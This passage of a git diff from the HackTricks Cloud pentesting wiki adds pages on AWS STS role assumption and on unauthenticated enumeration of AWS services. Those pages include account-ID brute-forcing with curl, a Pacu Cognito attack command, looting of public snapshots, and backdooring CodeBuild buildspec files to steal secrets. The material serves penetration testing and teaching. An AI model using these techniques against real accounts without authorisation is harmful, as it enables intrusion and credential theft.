--state-machine-alias-arn -## List executions of a state machine +## List executions of a state machine aws stepfunctions list-executions --state-machine-arn [--status-filter ] [--redrive-filter ] ## Retrieve information and relevant metadata about a state machine execution (output included) aws stepfunctions describe-execution --execution-arn @@ -321,39 +315,26 @@ aws stepfunctions list-executions --map-run-arn [--status-filter [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md new file mode 100644 index 000000000..7e73f30ea --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md @@ -0,0 +1,100 @@ +# AWS - STS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## STS + +**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). + +Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. + +### Assume Role Impersonation + +The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. + +For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. + +#### Assume Role Logic + +In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::role/priv-role" + }, + "Action": "sts:AssumeRole", + "Condition": {} + } + ] +} +``` + +The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). + +However, if a role is allowing an account to assume it, like in: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "sts:AssumeRole", + "Condition": {} + } + ] +} +``` + +The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. + +If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). + +### Enumeration + +```bash +# Get basic info of the creds +aws sts get-caller-identity +aws sts get-access-key-info --access-key-id + +# Get CLI a session token with current creds +## Using CLI creds +## You cannot get session creds using session creds +aws sts get-session-token +## MFA +aws sts get-session-token --serial-number --token-code +``` + +### Privesc + +In the following page you can check how to **abuse STS permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-sts-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-sts-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-sts-persistence.md +{{#endref}} + +## References + +- [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md new file mode 100644 index 000000000..3be49d173 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -0,0 +1,81 @@ +# AWS - EventBridge Scheduler Enum + +## EventBridge Scheduler + +{{#include ../../../banners/hacktricks-training.md}} + +## EventBridge Scheduler + +**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. + +There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." + +### Types of Schedules + +Types of Schedules in EventBridge Scheduler: + +1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. +2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. +3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. + +Two Mechanisms for Handling Failed Events: + +1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. +2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. + +### Targets + +There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. + +**Templated targets** support the following services: + +- CodeBuild – StartBuild +- CodePipeline – StartPipelineExecution +- Amazon ECS – RunTask + - Parameters: EcsParameters +- EventBridge – PutEvents + - Parameters: EventBridgeParameters +- Amazon Inspector – StartAssessmentRun +- Kinesis – PutRecord + - Parameters: KinesisParameters +- Firehose – PutRecord +- Lambda – Invoke +- SageMaker – StartPipelineExecution + - Parameters: SageMakerPipelineParameters +- Amazon SNS – Publish +- Amazon SQS – SendMessage + - Parameters: SqsParameters +- Step Functions – StartExecution + +### Enumeration + +```bash +# List all EventBridge Scheduler schedules +aws scheduler list-schedules + +# List all EventBridge Scheduler schedule groups +aws scheduler list-schedule-groups + +# Describe a specific schedule to retrieve more details +aws scheduler get-schedule --name + +# Describe a specific schedule group +aws scheduler get-schedule-group --name + +# List tags for a specific schedule (helpful in identifying any custom tags or permissions) +aws scheduler list-tags-for-resource --resource-arn +``` + +### Privesc + +In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/eventbridgescheduler-privesc.md +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md new file mode 100644 index 000000000..37df66613 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md @@ -0,0 +1,54 @@ +# AWS - Unauthenticated Enum & Access + +{{#include ../../../banners/hacktricks-training.md}} + +## AWS Credentials Leaks + +A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ +Some useful **tools**: + +- [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) +- [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) +- [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) + +## AWS Unauthenticated Enum & Access + +There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: + +- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) +- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) +- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) +- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) +- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) +- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) +- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) +- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) +- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) +- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) +- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) +- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) +- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) +- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) +- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) +- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) + +## Cross Account Attacks + +In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. + +During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: + +![](<../../../images/image (260).png>) + +Other services found vulnerable: + +- AWS Config +- Serverless repository + +## Tools + +- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md new file mode 100644 index 000000000..98621c498 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md @@ -0,0 +1,45 @@ +# AWS - Accounts Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Account IDs + +If you have a target there are ways to try to identify account IDs of accounts related to the target. + +### Brute-Force + +You create a list of potential account IDs and aliases and check them + +```bash +# Check if an account ID exists +curl -v https://.signin.aws.amazon.com +## If response is 404 it doesn't, if 200, it exists +## It also works from account aliases +curl -v https://vodafone-uk2.signin.aws.amazon.com +``` + +You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). + +### OSINT + +Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. + +### Marketplace + +If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. + +### Snapshots + +- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) +- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) +- Public AMIs (EC2 -> AMIs -> Public images) + +### Errors + +Many AWS error messages (even access denied) will give that information. + +## References + +- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md new file mode 100644 index 000000000..310015617 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md @@ -0,0 +1,56 @@ +# AWS - API Gateway Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### API Invoke bypass + +According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Permission", + "Action": ["execute-api:Execution-operation"], + "Resource": [ + "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" + ] + } + ] +} +``` + +The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. + +Some examples: + +- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. + +> [!WARNING] +> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ +> So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ +> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. + +You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. + +For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). + +### IAM Policy Injection + +In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. + +### Public URL template + +``` +https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} +``` + +### Get Account ID from public API Gateway URL + +Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ +This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). + +You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md new file mode 100644 index 000000000..fc68629f1 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md @@ -0,0 +1,11 @@ +# AWS - Cloudfront Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://{random_id}.cloudfront.net +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md new file mode 100644 index 000000000..9dc5feb14 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md @@ -0,0 +1,35 @@ +# AWS - CodeBuild Unauthenticated Access + +{{#include ../../../banners/hacktricks-training.md}} + +## CodeBuild + +For more info check this page: + +{{#ref}} +../aws-services/aws-codebuild-enum.md +{{#endref}} + +### buildspec.yml + +If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. + +Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. + +For some related information you could check the page about how to attack Github Actions (similar to this): + +{{#ref}} +../../../pentesting-ci-cd/github-security/abusing-github-actions/ +{{#endref}} + +## Self-hosted GitHub Actions runners in AWS CodeBuild + +As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: + +```bash +runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} +``` + +This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md similarity index 51% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md index 26a18d922..0a788f6e8 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - Cognito Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Unauthenticated Cognito @@ -21,9 +8,9 @@ Cognito is an AWS service that enable developers to **grant their app users acce For basic info about Cognito check: -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} ### Identity Pool ID @@ -47,8 +34,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` @@ -58,17 +45,4 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md new file mode 100644 index 000000000..de97c7405 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md @@ -0,0 +1,11 @@ +# AWS - DocumentDB Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +.cluster-..docdb.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md new file mode 100644 index 000000000..6e340d59e --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md @@ -0,0 +1,15 @@ +# AWS - DynamoDB Unauthenticated Access + +{{#include ../../../banners/hacktricks-training.md}} + +## Dynamo DB + +For more information check: + +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} + +Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md new file mode 100644 index 000000000..280a7c27b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md @@ -0,0 +1,60 @@ +# AWS - EC2 Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## EC2 & Related Services + +Check in this page more information about this: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} + +### Public Ports + +It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. + +#### SSRF + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} + +### Public AMIs & EBS Snapshots + +AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: + +```bash +# Public AMIs +aws ec2 describe-images --executable-users all + +## Search AMI by ownerID +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' + +## Search AMI by substr ("shared" in the example) +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' + +# Public EBS snapshots (hard-drive copies) +aws ec2 describe-snapshots --restorable-by-user-ids all +aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' +``` + +If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. + +#### Public URL template + +```bash +# EC2 +ec2-{ip-seperated}.compute-1.amazonaws.com +# ELB +http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 +https://{user_provided}-{random_id}.{region}.elb.amazonaws.com +``` + +### Enumerate EC2 instances with public IP + +```bash +aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md new file mode 100644 index 000000000..a36e4b72b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md @@ -0,0 +1,34 @@ +# AWS - ECR Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## ECR + +For more information check: + +{{#ref}} +../aws-services/aws-ecr-enum.md +{{#endref}} + +### Public registry repositories (images) + +As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. + +```bash +aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text +``` + +> [!WARNING] +> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. + +### Enumerate Private Repo + +The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. + +```bash +# Get image names +skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' +crane ls | sed 's/ .*//' +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md new file mode 100644 index 000000000..4a2d961f5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md @@ -0,0 +1,25 @@ +# AWS - ECS Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## ECS + +For more information check: + +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} + +### Publicly Accessible Security Group or Load Balancer for ECS Services + +A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. + +```bash +# Example of detecting misconfigured security group for ECS services +aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' + +# Example of detecting a publicly accessible load balancer for ECS services +aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md new file mode 100644 index 000000000..bd570128c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md @@ -0,0 +1,37 @@ +# AWS - Elastic Beanstalk Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Elastic Beanstalk + +For more information check: + +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} + +### Web vulnerability + +Note that by default Beanstalk environments have the **Metadatav1 disabled**. + +The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** + +### Insecure Security Group Rules + +Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. + +### Publicly Accessible Load Balancer + +If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. + +### Publicly Accessible S3 Buckets + +Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. + +### Enumerate Public Environments + +```bash +aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md new file mode 100644 index 000000000..73c113dca --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -0,0 +1,12 @@ +# AWS - Elasticsearch Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://vpc-{user_provided}-[random].[region].es.amazonaws.com +https://search-{user_provided}-[random].[region].es.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md 